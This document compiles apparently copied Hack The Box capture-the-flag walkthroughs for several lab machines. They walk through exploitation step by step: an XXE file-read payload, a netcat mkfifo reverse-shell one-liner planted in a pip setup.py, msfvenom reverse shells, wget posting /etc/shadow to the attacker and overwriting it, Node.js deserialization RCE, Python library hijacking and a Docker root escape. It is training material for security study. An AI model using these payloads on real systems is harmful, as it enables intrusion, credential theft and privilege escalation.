Walkthroughs 2 PDF

Download as pdf or txt
Download as pdf or txt
You are on page 1of 99

DevOops

Wednesday, January 2, 2019 7:13 PM

Level: Medium
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of
DevOops is 10.10.10.91
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
1 nmap -p- -A 10.10.10.91 --open

From Nmap scanning, we have enumerated port 22 and 5000 are only open
ports on the target’s network, therefore firstly, let’s navigate to port 5000 through a web
browser. By exploring given URL, it puts up following web page as shown in the below
image.
1 http://10.10.10.91:5000
Since we didn’t get any remarkable clue from the home page, therefore, we have opted
Dirb tool for directory enumeration thus execute the following command.
1 dirb http://10.10.10.91:5000

Walkthroughs 2 Page 1
Hmm!! Here I received HTTP response 200 for /feed and /upload directories.

So we explore http://10.10.10.91:5000/upload in the URL and further welcomed by


following web Page given below. The following web page lets you upload an XML file,
including XML elements Author, Subject and content. For that reason, we have created
an XML file with the help of following code and saved as 1.xml.
1 <?xml version="1.0"?>
2 <!DOCTYPE foo [
3 <!ELEMENT foo ANY >
4 <!ENTITY xxe SYSTEM "file:///etc/passwd" >
5 ]>
6 <feed>
7 <Author>raj</Author>
8 <Subject>chandel</Subject>
9 <Content>&xxe;</Content>
10 </feed>
Then browse the xml file, which you have created and intercept the browser request
with the help of burp suite while uploading.

Walkthroughs 2 Page 2
with the help of burp suite while uploading.

Now send the intercepted data to the repeater.


Inside XXE file, we have injected malicious code to make call for /etc/passwd file, thus,
we need to analysis its result in the repeater.

And as you can observe from the given below image, the xml code is working
wonderfully and throwing the content of /etc/passwd file to us.

Walkthroughs 2 Page 3
wonderfully and throwing the content of /etc/passwd file to us.

Similar, we extract the SSH RSA key by modifying XXE entry as show in the below
image. Now copy the whole key and save in a text file.

Since we have copied RSA Private KEY in a text file named as “key” , then set

Walkthroughs 2 Page 4
Since we have copied RSA Private KEY in a text file named as “key” , then set
permission 600 and try to login with the help of following command.
1 chmod 600 key
2 ssh -i key [email protected]
Boom!! We have spawn a shell of target machines, let’s go for user.txt file.
1 cd /home
2 ls
3 cd roosa
4 ls
5 cat user.txt

Great!!! We have completed the first task but for obtaining root.txt file we need to
escalate the root privilege and to do so we traversed so many directories and files to get
next clue.
1 cd work
2 ls
3 cd blogfeed/
4 ls
5 cat run-gunicorn.sh
6 cd resource
7 ls

Walkthroughs 2 Page 5
so we found .git directory here, lets check git with the following command.
1 git log
And we obtain so many string as shown in the following image which may perhaps SSH
key for root login.

Walkthroughs 2 Page 6
So we try some key along git show command to demonstrate the output result. And
obtain RSA Private Key which was not working properly.

Walkthroughs 2 Page 7
And finally obtain original RSA Key which is highlighted in Red text, now copy the red
color text a file and remove ‘–’ used in each line instead add “—–END RSA PRIVATE
KEY—–”

Walkthroughs 2 Page 8
Since we have copied RSA Private KEY in a text file named as “rootkey” then set
permission 600 and try to login with the help of following command.
1 chmod 600 key
2 ssh -i key [email protected]
3 ls
4 cat rootr.txt
Congrats!! We have found root.txt and from the image below you can see we have

Walkthroughs 2 Page 9
Congrats!! We have found root.txt and from the image below you can see we have
obtained the value of root.txt.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an


Information Security Consultant Social Media Love

From <https://www.hackingarticles.in/hack-the-box-devoops-walkthrough/>

Walkthroughs 2 Page 10
Olympus
Wednesday, January 2, 2019 7:13 PM

Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have static IP. The IP of
Olympus is 10.10.10.83
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
1 nmap -A 10.10.10.83

From scanning through nmap, we found that here port 22 is filtered for SSH but instead
of that port 2222 is also open for SSH. Moreover port 53 is open for DNS where it has
grabbed banner “Bind” and even it found the port 80 is opened for Apache http server.
Therefore firstly, let’s navigate to port 80 in the web browser.

Walkthroughs 2 Page 11
Therefore firstly, let’s navigate to port 80 in the web browser.

After exploring target IP in the web browser, we were welcomed by a zeus picture as
shown in the above image. Unfortunately! Here we are unable to find any remarkable
clue, therefore we have decided to run Nikto for scanning possible vulnerabilities.
Let’s find the list of possible vulnerabilities using Nikto:
1 nikto -h http://10.10.10.83

Scanning with nikto gave us a clue to move forward which is Uncommon header
‘xdebug’. Searching the keyword ‘xdebug’ on google gave us result about ‘xdebug’
command execution exploit module for metasploit. After that load metasploit on your
terminal and use the commands as follows:
1 msf > use exploit/unix/http/xdebug_unauth_exec
2 msf (exploit/unix/http/xdebug_unauth_exec) > set rhost 10.10.10.83
3 msf (exploit/unix/http/xdebug_unauth_exec) > set lhost 10.10.14.13
4 msf (exploit/unix/http/xdebug_unauth_exec) > exploit

Walkthroughs 2 Page 12
4 msf (exploit/unix/http/xdebug_unauth_exec) > exploit
Boom!! We have got the meterpreter of the target machine. Then further exploring
directories, we noticed a directory /zeus which got a sub directory /airgeddon. As you
can relate it with the image below.

Then inside the /airgeddon directory, we opened its sub directory /captured which
shows a file captured.cap.It could be another clue, therefore we downloaded this
file on our Kali Desktop as you can see in the image below.

Walkthroughs 2 Page 13
file on our Kali Desktop as you can see in the image below.

After downloading capture.pcap file, we need to analysis it. So when we open this file, it
was a wireshark pcap file and by streaming the 1st packet we noticed SSID:
Too_clOse_to_th3_Sun as shown in the image. This can be probably used as a
Password.

Walkthroughs 2 Page 14
Now cracking the file captured.cap using aircrack following command:
1 aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
After few minutes we have found the key: flightoficarus as shown in the image below.

Walkthroughs 2 Page 15
After few minutes we have found the key: flightoficarus as shown in the image below.

We thought icarus could be a username too. Because earlier when we search “Too
close to the Sun” in the Google, it shows the wiki page of icarus. Therefore the
following combination of credentials can be used for SSH login via port 2222.
1 icarus:Too_clOse_to_th3_Sun
2 ssh [email protected] -p 2222
After successfully logging into SSH on navigating further, we acquired a
file “help_of_the_gods.txt”. After reading the file it shows us a domain
name ctfolympus.htb as shown in the image below.

We thought of trying dns zone transfer, since dig uses the axfr response to retrieve
your zone information.
1 dig axfr @10.10.10.83 ctfolympus.htb
From the result we figured that pormetheus can be another username and St34l_th3
_F1re! could be the possible password. Also there is series of some random port
numbers 3456 8234 62431 and this bring us to ponder on port Knocking that can
change the state of SSH port 22 from filtered to open.

Walkthroughs 2 Page 16
We knocked these ports by executing following command:
1 knock -v 10.10.10.83 3456 8234 62431
After knocking these ports just to confirm the state of SSH port 22 by using nmap scan.
Here we succeeded in making the SSH port open.
1 nmap -p22 10.10.1083

Now by logging into SSH port 22 by using the given below credentials:
1 Prometheus: St34l_th3_F1re!
Here!! We have found and read user.txt.
Yuppiee!! We have completed our first task, moving on towards second task.

Walkthroughs 2 Page 17
Then using id command, it came into notice that prometheus is in docker users
group. Let’s have a look at docker images and docker ps as shown in the image
below.
1 docker image
2 docker ps

By executing the above command we notice there is a docker_image “olympia” hence


we can create a copy of a bash with the following command to escalate root privileges:
Time to get root.txt!!
After looking for some information on how to exploit this, we find that we can access it
as root by using the following command:
1 docker run -v /:/root -i -t olympia /bin/bash

Walkthroughs 2 Page 18
1 docker run -v /:/root -i -t olympia /bin/bash
Booyah!! We have found root.txt and from the image below you can see we have
obtained the value of root.txt.

Aut

From <https://www.hackingarticles.in/hack-the-box-olympus-walkthrough/>

Walkthroughs 2 Page 19
Sunday
Wednesday, January 2, 2019 7:13 PM

Level: Easy
Task: find user.txt and root.txt file in victim’s machine.
WalkThrough
Since these labs are online available therefore they have static IP. The IP of Sunday is
10.10.10.76
Let’s start off with scanning the network to find our target.
1 nmap -p- -A 10.10.10.76 --open

So here, we notice very interesting result from nmap scan, here it shown port 79 is
open for Sun Solaris fingerd. So I Goggled for its exploit and found metasploit exploit
“Finger Service User Enumerator”.
Then I load metasploit framework for Identify valid users through the finger service
using a variety of tricks and therefore, use following module.
1 use auxiliary/scanner/finger/finger_users
2 msf auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76
3 msf auxiliary(scanner/finger/finger_users) > set users_file
4 /root/pentest/SecLists/Usernames/Nmaes/name.txt
msf auxiliary(scanner/finger/finger_users) > exploit

Walkthroughs 2 Page 20
So, basically it reviled so many username which it has found, now make a dictionary of
the obtain username and password that will be helpful in SSH login brute force.
Here we have used “patator” for SSH login to launch brute force on port 22022 and
execute following command.
1 patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=probable-
v2-top1575.txt persistent=0
Finally we found the following the password of the user “sunny”.
Password: sunday

But when we try to login into ssh by using above credential, it gave “no matching key
exchange method found” error and also put some hint and drop the connection request.

Then with little more research I edit the following key to connect SSH and luckily obtain
tty shell access.
1 ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected] -p22022
2 sudo -l
Then I check sudo right for user sunny and notice he can run /root/troll as root without
password.
Lol!! Executing /root/troll was a troll. Further I check the list for available list and
directories, luckily I found shadow.backup inside the /backup directory.
Inside shadow.backup, I found hashes for users Sammy and Sunny.

Walkthroughs 2 Page 21
Inside shadow.backup, I found hashes for users Sammy and Sunny.

So we try to crake these hashes by using john the ripper and fortunately obtained the
password in plaintext format “cooldude!” of user sammy.

Privilege Escalation Techniques


There are multiple ways to escalated root privilege in this lab, in this article we have
applied 4-ways to escalated root privilege to get root.txt file.
Now let’s switch from Sunny to Sammy and figure-out assigned sudo permission for
him.
1 sudo -l
Great!! We found that he has right to download any file as root by
using wget command. Now let’s also enumerate system binaries having enable SUID
bit.
1 find / -perm -u=s -type f 2>/dev/null
There so many binary files having SUID bit enabled, let’s exploit some of them to gain
root privilege.

Walkthroughs 2 Page 22
root privilege.

Method 1
Now let’s generate a payload using msfvenom, thus you can execute following
command and run php server to transfer this file.
1 msfvenom -p solaris/x86/shell_reverse_tcp lhost=10.10.14.6 lport=5555 -f elf >
2 /root/Desktop/raj.elf
php -S 0.0.0.0:80

Walkthroughs 2 Page 23
Let’s download above raj.elf through wget inside /tmp directory and replace it from rsh
binary. Then start netcat listen in a new terminal to spawn tty shell of root privilege.
1 cd /tmp
2 sudo /usr/bin/wget 10.10.14.6/raj.elf -O /usr/bin/rsh
3 /usr/bin/rsh

Now when you will execute /usr/bin/rsh command, you get root privilege shell access
as shown below in the image.
1 id
And as you can observer the euid=0 for root, therefore, now let’s grab the root.txt file.
1 cd /root
2 ls
3 cat root.txt

Method 2
The pfexec program is used to execute commands with the attributes specified by the
user’s profiles in the exec_attr(4) database. It is invoked by the profile shells, pfsh,
pfcsh, and pfksh which are linked to the Bourne shell, C shell, and Korn shell,
respectively.
From https://www.unix.com/man-page/all/1/pfexec/

Walkthroughs 2 Page 24
From https://www.unix.com/man-page/all/1/pfexec/

Now execute following command to obtain root privilege shell.


1 pfexec bash
2 id
3 cd /root
4 ls
5 cat root.txt
So, in this lab challenge we obtain root.txt file through four types of privilege escalation

Walkthroughs 2 Page 25
So, in this lab challenge we obtain root.txt file through four types of privilege escalation
and there might be other ways also available to get root.txt file. Try it yourself!!
Happy Hacking

Method 3
As we know that the sudo permission is available for the wget, thus we can use post-file
option method to send the contents of any file for example /etc/password or /etc/shadow
files.

Therefore we execute following command to post shadow file content on our local
listening machine.
1 sudo /usr/bin/wget --post-file=etc/shadow 10.10.14.6

And in the terminal where netcat listener is activated you will get the content of shadow
file.
1 nc -lvp 80
From the given image, you can observe that we have obtain the hash value of the root
user. Either you can crack the hash value or can modify it.

Walkthroughs 2 Page 26
So we have copied the above content in a text file and so that we can replace the hash
value of user: root from the hash value of user: sunny.

Walkthroughs 2 Page 27
In the given below image you can observe that we have modified the root hash value by
copying user sunny hashes, as we know that the password of sunny is “sunday”. Hence
the new password for root will be sunday, now named the file as shadow and ready to
transfer it.

Walkthroughs 2 Page 28
transfer it.

Now download the above modified shadow file in its original path i.e. /etc/shadow, so
that it will overwrite the original shadow file.
1 sudo /usr/bin/wget 10.10.14.6/shadow -O /etc/shadow

Method 4
Similarly we can also post the content of root.txt file directly to the listening machine.
1 sudo /usr/bin/wget --post-file=/root/root.txt 10.10.14.6

Walkthroughs 2 Page 29
And in the terminal where netcat listener is activated you will content of root.txt file
which is root flag.
1 nc -lvp 80
From the given image, you can observe that we have obtain the value of the root.txt.

Auth

From <https://www.hackingarticles.in/hack-the-box-sunday-walkthrough/>

Walkthroughs 2 Page 30
Gemini Inc 2
Wednesday, January 2, 2019 7:13 PM

Walkthroughs 2 Page 31
Canape
Wednesday, January 2, 2019 7:14 PM

Level: Intermediate
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of Canape
is 10.10.10.70 so let’s begin with nmap port enumeration.
1 nmap -p- -sV 10.10.10.70
From given below image, you can observe we found port 80 and 65535 are open on
target system.

As port 80 is running http server, we open the target machine’s IP address in our
browser and find that it is a fan site for the Simpsons.

Walkthroughs 2 Page 32
We don’t find anything on the webpage, so we run dirb scan to enumerate the
directories. The target machine responded with 200 OK for every request but for the
/.git/Head directory the size of the response changed.
1 dirb http://10.10.10.70 -f

We open the /.git/ directory and find the config file.

Walkthroughs 2 Page 33
When we open the config file, we find a domain name “git.canape.htb”.

Walkthroughs 2 Page 34
When we open the config file, we find a domain name “git.canape.htb”.

Now we have added the domain name of the target machine in /etc/hosts file to access
the webpage using IP address as well as domain name.

Now we can clone the local git repository using the following command:
1 git clone http://git.canape.htb/simpsons.git
Here we found out a file named “__init__.py” in Simpsons folder as shown in the
image.

Walkthroughs 2 Page 35
After download the files, we open “__init__.py” and find that this program might
be vulnerable insecure deserialization as it uses a vulnerable function
“cPickel.loads(data)”.

Now we create a program to exploit this vulnerability and get reverse shell. You can
download the exploit from here.

We setup our listener “netcat” before running the program and run the following
command:
1 nc -lvp 443

Walkthroughs 2 Page 36
After getting reverse shell, we start penetrating more and more. We check for the open
ports in the target machine that might be listening locally and find that a service is
running on port 5984 for the Apache couchDB.
1 netstat -antp

Apache couchDB is an open source database software. We check the version of


couchDB and also find all the databases using the following command:
1 curl http://127.0.0.1:5984
2 curl http://127.0.0.1:5984/_all_dbs
Using the above command, we find the version of couchDB to be “2.0.0”. This version of
couchDB is vulnerable to remote privilege escalation. You can find more about this
vulnerability here.

Walkthroughs 2 Page 37
Then we create a user with permissions to read the database with following command.
1 curl -X PUT 'http://localhost:5984/_users/org.couchDB.user:hack' --data-binary '{ "type":
"user", "name": "hack", "roles": ["_admin"], "roles": [], "password": "password" }’
We then dump the database with the following command:
1 curl http://127.0.0.1:5984/passwords/_all_docs?include_docs=true -u hack:password
The above command will dump the password and we will find the password for SSH
login. Now all we need to do is find the username.

We open /etc/passwd to find users available on the target machine. We find that there is
only one proper user called homer.

Walkthroughs 2 Page 38
only one proper user called homer.
1 cat /etc/passwd

We login through SSH using the credentials we found earlier


“homer:0B4jyA0xtytZi7esBNGp”. After login we find a file ‘user.txt’. We open the file
and find our first flag.
After getting the flag, we checked the sudoers list and find homer has permission to run
“pip install *” as root user.
1 ssh [email protected] -p65535
2 ls
3 cat user.txt
4 sudo -l

Walkthroughs 2 Page 39
Now as we know we can run “pip install *” as root, we are going to abuse it by creating
a reverse shell and saving it as “setup.py”.
We are going to use netcat pipe one liner to get reverse shell.
1 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f

Now we can run our reverse shell using the following command:
1 sudo pip install .
Remember to setup the listener before running the above command.

As soon as we run our command, we get our reverse shell as root user. We now move
to /root directory and to get “root.txt”. We take a look at the content of the file and find
our final flag.
1 nc -lvp 4444
2 id
3 cd /root
4 ls
5 cat root.txt

Walkthroughs 2 Page 40
Au

From <https://www.hackingarticles.in/hack-the-box-challenge-canape-walkthrough/>

Walkthroughs 2 Page 41
Stratosphere
Wednesday, January 2, 2019 7:14 PM

Level: Easy
Task: find user.txt and root.txt file in victim’s machine.
WalkThrough
Since these labs are online available therefore they have static IP. The IP of
Stratosphere is 10.10.10.64
Let’s start off with scanning the network to find our target.
1 nmap -sV 10.10.10.64

As per nmap port 80 is open for HTTP let’s explore the target IP in the browser. After
exploring port 80, we was welcomed by following page where we didn’t found any
informative clue.

Walkthroughs 2 Page 42
After then we visit Port 8080 for HTTP proxy and here also we get same web page. We
try to inspect source code of port 80 and 8080 but we got nothings.

Walkthroughs 2 Page 43
Therefore next we decided to have directory brute force attack with help of Dirbuster
and used wordlist “dictionary-list-2.3-medium.txt” for the attack.

Walkthroughs 2 Page 44
and used wordlist “dictionary-list-2.3-medium.txt” for the attack.

Luckily it fetched some web directories such as /Monitoring, let’s explore it in the web
browser.

So when we try to open the URL http://10.10.10.64:8080/Monitoring then it gets


redirect to http://10.10.10.64:8080/Monitoring/example/Welcome.action for login. I
closely look at the URL containing .action extension, so I made Google search to
extract complete information related to this extension. I found action extension is utilized
by apache struts2 which has a history of bugs and vulnerabilities and if you will search

Walkthroughs 2 Page 45
by apache struts2 which has a history of bugs and vulnerabilities and if you will search
for its exploit, you will get lot of python scripts and exploits to compromise this service.

So we used nmap script to identify its state of vulnerability


1 nmap -p8080 --script http-vuln-cve2017-563 --script-args path=/Monitoring/ 10.10.10.64
Awesome!!! It is vulnerable to cve2017-563, let’s exploit it.

I found an exploit Struts-Apache-ExploitPack , lets download it from git hub and give full
permission.
1 git clone https://github.com/drigg3r/Struts-Apache-ExploitPack.git

Walkthroughs 2 Page 46
1 git clone https://github.com/drigg3r/Struts-Apache-ExploitPack.git
2 cd Struts-Apache-ExploitPack
3 cd Exploiter
4 ls
5 chmod 777 Exploit.sh

Now run the following command to exploit the victim machine.


1 ./Exploit.sh http://10.10.10.64:8080/Monitoring/example/Welcome.action
2 id
3 ls
4 cat db_connect
5 Username: admin
6 Password: admin

So now we have database credential, let’s utilized them for getting all information from
inside the database.
1 mysqldump -u admin -padmin --all-databases --skip-lock-tables
Here I found Password “9tc*rhKuG5TyXvUJOrE^5CK7k” for user Richard, now let’s try
to connect with SSH using these credential.

Walkthroughs 2 Page 47
to connect with SSH using these credential.

1 ssh [email protected]
Yuppie we successfully logged in victim’s machine, so now let get the user.txt and
root.txt
1 ls
2 cat user.txt
3 cat test.py
Here we notice that test.py was computing some hash values and at the end it will give
success.py from inside the root directory and whole script is depends upon hashlib.

Walkthroughs 2 Page 48
success.py from inside the root directory and whole script is depends upon hashlib.

Then we also check sudo rights for Richard and found he has sudo right to run all type
of python script. So very first we check test.py file and start solving hashes in order to
get success.py
1 sudo /usr/bin/python /home/richard/test.py

Walkthroughs 2 Page 49
1 sudo /usr/bin/python /home/richard/test.py

So we got the hash value, now we need to decode it and after decoding I found
“kayboo!”

On submitting the decoded text, it generated a new hash for further step and again I
decode it and submit the answer and after then again a new hash and it was processing
repetitively same at each time on submitting decoded text.
Since test.py was importing hashlib which was a python library so I last option was
python library hijacking to escalate the root privilege.

Therefore I create a hashlib.py script in the current directory to import system binary
‘/bin/bash’ and hence now when we will run test.py then it will import hashlib.py which
will calls /bin/bash binary file.
1 echo 'import os;os.system("/bin/bash")' > hashlib.py
2 sudo /usr/bin/python /home/richard/test.py
Booom!!! Here we owned root access, now let’s get the root.txt file and finish this task.

Walkthroughs 2 Page 50
Author: Ankur Sachdev is Information Security consultant and researcher in the field of
Network & WebApp Penetration Testing .

From <https://www.hackingarticles.in/hack-the-box-stratospherewalkthrough/>

Walkthroughs 2 Page 51
Celestial
Wednesday, January 2, 2019 7:14 PM

Expert level.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
WalkThrough
Since these labs are online available therefore they have static IP. The IP of Celestial
is 10.10.10.85
Let’s start off with scanning the network to find our target.
1 nmap -A 10.10.10.85

The NMAP output shows us that the port TCP 3000 is opened on the target
machine Let’s try to access the website on a Non-standard HTTP port (3000) as
follows :
Browse to http://10.10.10.85:3000 and we will be greeted with the following page

As we didn’t find any other clue to move forward after navigating through many other
possibilities; we quickly moved further to understand the website request via Burpsuite
tool. Therefore, upon capturing the webpage’s GET request, we noticed
the profile= Cookie parameter (highlighted in red)

Walkthroughs 2 Page 52
Copy the entire value inside the profile= cookie parameter and paste it in the Burpsuite
decoder .
1 eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgR
HVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D
On decoding the same we will get the output in base64 format . Once again , we will
decode the base64 format output and would be able to see the results in clear text
format. The output displays username and other details of a specific user This is an
indication that we can insert our code in the cookie profile parameter value to get the
desired results.

Walkthroughs 2 Page 53
desired results.

On further investigation , we came to know that this is a Node JS deserialization bug for
the purpose of remote code execution . Further details of the same are mentioned in the
below website .If we read the entire content of the website , we will observe that there is
a function which contains a particular string comprising of multiple numeric values.
https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-
remote-code-execution/

Walkthroughs 2 Page 54
Copy the entire numeric content (after String.fromCharCode) starting from 10 till 10 .
Navigate to the URL https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-
converter.html and convert Decimal to ASCII as shown in the screenshot below

Walkthroughs 2 Page 55
converter.html and convert Decimal to ASCII as shown in the screenshot below

Now let’s change the contents of the ASCII text and replace the HOST and PORT
parameter details with the HOST=10.10.14.3 and PORT= 4444, where 10.10.14.3 is our
Kali machine IP . Once done, we will get the equivalent output in the Decimal format as
shown below

Walkthroughs 2 Page 56
shown below

Copy the decimal output from the above screenshot starting from 118 and ending with
10, with each number , separated by a comma.
Note : As we can see that the decimal output in the above output is separated by a
space , hence we need to either do it manually OR need to refer to the following Python
script method so as to include the comma values , before proceeding further
https://github.com/Sayantan5/Holiday/blob/master/encode.py
Once the decimal output (separated by comma) is ready , we need to now paste it
inside the code shown below (replace the value with decimal output) and perform the
Base64 encode of the same
1 echo {"username":"_$$ND_FUNC$$_function (){ eval(String.fromCharCode(value) )}()"} |
base64 -w0

Walkthroughs 2 Page 57
Copy the encoded output above and paste it in front of the Profile= parameter of the
Burpsuite as shown in the image below.

Walkthroughs 2 Page 58
Burpsuite as shown in the image below.

Once done we need to click on the Forward option , in Burpsuite Intercept tab
Note : Before forwarding the modified content in Burpsuite , we should setup the netcat
listener in Kali machine and keep it ready .
1 nc -lvp 4444
In order to access proper TTY shell , we had imported python one line script by typing
following:
1 python -c 'import pty;pty.spawn("/bin/bash")'
Hurray !! We got into the reverse shell of the target machine
Lets have a quick look at the contents
ls
We navigated to many folders , however found interesting stuff in the Documents folder
1 cd Documents
Here we can see that there is a user.txt file , lets read it contents
1 cat user.txt
Finally , we got our first flag i.e output of user.txt file

Walkthroughs 2 Page 59
Now upon further navigation , we also opened the script.py file because of our curiosity
to examine the contents of the same . If we do cat script.py , the output displays
as print “Script is running”
1 cat script.py
print “Script is running..”
Note : This is an indication that we may need to examine the log files to see which
script is running and if it is running on a periodic basis
The best step to move forward is to examine the contents of the log directory in var
1 cd /var/log
Let’s see the files listed over here
1 ls
As we can see that there are multiple syslog files being generated in this folder . The old
logs are being zipped and numbered accordingly .The latest logs are always stored in
the log file named syslog .So we will open the contents of the syslog file and try to find
out if there is something interesting going on.
1 cat syslog
We will notice that there is a cronjob running every 5 minutes , which is copying the
output of script.py file (in the home/sun/Documents folder) to the output.txt file

Walkthroughs 2 Page 60
Now we can try to put our own content in the script.py file . For this let’s generate a
Reverse shell with the following command
1 msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=1234 R
Copy the contents of msfvenom output and save it on Kali Desktop named
as script.py ,which will be further used in the subsequent steps

Now run the web server on the Kali machine


1 python -m SimpleHTTPServer 80

Lets read the contents of the script.py .The output displays as print “Script is running..”
1 cat script.py
Lets move this original python script (script.py) by renaming it to script.py.original as

Walkthroughs 2 Page 61
Lets move this original python script (script.py) by renaming it to script.py.original as
shown below
1 mv script.py script.py.original
Download our newly created script.py from the Kali machine Desktop
1 wget http://10.10.14.3/script.py

Open a netcat reverse shell


1 nc -lvp 1234
In order to access proper TTY shell , we had imported python one line script by typing
following:
1 python -c 'import pty;pty.spawn("/bin/bash")'
Hurray!! We got into the root
Navigate to the root directory
1 cd /root
Let’s see what content it has .
1 ls
As we can see it contains 2 files root.txt and script.py . Lets open root.txt file
1 cat root.txt

Walkthroughs 2 Page 62
Wonderful!! We have gained access to both user.txt and root.txt files and hacked this
box.
Author: Ankur Sachdev is Information Security consultant and researcher in the field of
Network & WebApp Penetration Testing . Contact Here

From <https://www.hackingarticles.in/hack-the-box-celestial-walkthrough/>

Walkthroughs 2 Page 63
Minion
Wednesday, January 2, 2019 7:14 PM

Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of Minion is 10.10.10.57 so let’s
begin with nmap port enumeration.
1 nmap -sV -p- 10.10.10.57 -–open
From given below image, you can observe that we find port 62696 is open on target system.

As port 62696 is running IIS http service, we open the IP address in our browser on port 62696.

We don’t find anything on the webpage, so we run dirb to enumerate the directories. As the target
machine is running Microsoft IIS server we try to find .asp file.
1 dirb http://10.10.10.57:62696 -X .asp

Walkthroughs 2 Page 64
Dirb scan gave us a link to page called test.asp, we open the link and find a page that is asking for u as
its parameter.

After enumerating this system, we find that this page is vulnerable to SSRF. So when we try access
localhost we find a link called system commands.

Walkthroughs 2 Page 65
localhost we find a link called system commands.

As we are not directly accessing the page, we take a look at the source code and find the link to system
command.

We open it using SSRF and find a form that can be used to execute our commands.

Walkthroughs 2 Page 66
We open it using SSRF and find a form that can be used to execute our commands.

When we try to execute a command we are unable to. So we take a look at the source code of the page
and find the parameter that is being used to pass the command we type.

Walkthroughs 2 Page 67
After finding the parameter we use it pass our command and we find that we only get a response in
terms of Exit Status. Exit Status = 1 for successful and Exit Status = 0 in case of errors.

Now when we try to get a reverse shell we are unable to, it is possible that TCP and UDP packets are

Walkthroughs 2 Page 68
Now when we try to get a reverse shell we are unable to, it is possible that TCP and UDP packets are
blocked. So we ping ourselves using this RCE vulnerability to check if ICMP packet is allowed.

We setup tcpdump to capture the icmp packets and find that icmp packets are allowed.
1 tcpdump -i tun0 icmp

We create an icmp reverse shell because few characters are blacklisted on the server.

Walkthroughs 2 Page 69
We run it on the vulnerable page that we found earlier.

We create our custom reverse shell (you can download here), we run it and after a few moments we get
a reverse shell. We take look at the c:\ directory and find a directory called “sysadmscripts”.

Walkthroughs 2 Page 70
We go to root directory and find two files called “c.ps1” and “del_logs.bat”.

We take a look at the content of the file, and find that c.ps1 writes something inside a file that is passed
as its argument. In “del_logs.bat” file it creates logs inside log.txt inside c:\windows\temp\ directory and
find that the time is changed every 5 minutes.

Walkthroughs 2 Page 71
Now we check the permissions for both of these files with icacls and find that we have full permissions
over c.ps1.
1 icacls c.ps1

Now we change the original c.ps1 with our file, so that we can try and get the user.txt and root.txt.
1 echo "dir c:\users\administrator\Desktop > c:\temp\output.txt" > c:\temp\test.ps1
2 echo "dir c:\users\decoder.MINION\Desktop >> c:\temp\output.txt" >> c:\temp\test.ps1
3 echo "copy c:\users\administrator\Desktop\root.txt c:\temp\root.txt" >> c:\temp\test.ps1
4 echo "copy c:\users\decoder.MINION\Desktop\* c:\temp\" >> c:\temp\test.ps1
5 (Get-Content c:\temp\test.ps1) | ForEach-Object { $_ -replace """", "" } | Set-Content c:
6 \temp\test.ps1
7 copy c:\sysadmscripts\c.ps1 c:\temp\c.ps1.bak
copy c:\temp\test.ps1 c:\sysadmscripts\c.ps1

Walkthroughs 2 Page 72
We wait for few minutes for the powershell script to get executed and find that we were able to
successfully able to extract “user.txt”. We open the file and find the first flag. We also zip file called
“backup.zip”. Before looking in the zip backup file, we take a look at the content of “output.txt” and find
that the file was in “c:\users\decoder.MINION\Desktop” directory.

Enumerating further backup.zip file we extract PASS from alternate data stream files.
1 get-content c:\temp\backup.zip -str pass

Walkthroughs 2 Page 73
We decode the NTLM hash using hashkiller.co.uk and find the password to be 1234test.

We mount the C$-Share using the credentials we found by cracking the hash.
1 net use * \\minion\c$ /user:minion\administrator 1234test

As we can see the hard disk got mounted as “Drive Z:”. We go to Z: drive and inside “z:\User
\Administrator\Desktop”. We find two files called root.txt and root.exe, when take a look at the content
of “root.txt” it tells us to run “root.exe”. We try to run root.exe but are unable to get a flag because we
are not Administrator yet.

Let’s set users as administrator using $user and giving the password using $pass and then convert the
string using convert-to-securestring-asplaintext-force using the PSCredetail we created the a new
object that further will help us to create a new session which will run the commands as administrator.
Lastly we will run the root.exe using the invoke-command. And as you can see in the given screenshot
we have decoded successfully the securestring.
1 $user = "minion\administrator"
2 $pass = "1234test” | convert to-securestring – asplaintext –force
3 $cred = new-object –typename System.Managemet.Automation.PSCredential –
4 argumentlist $user, $pass
5 $session = new-pssession minion –Credential $cred
invoke-command –Session $session {cd C:\users\administrator\desktop; .\root.exe}

Walkthroughs 2 Page 74
Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast.
Contact Here
Share this:
• Click to share on Twitter (Opens in new window)
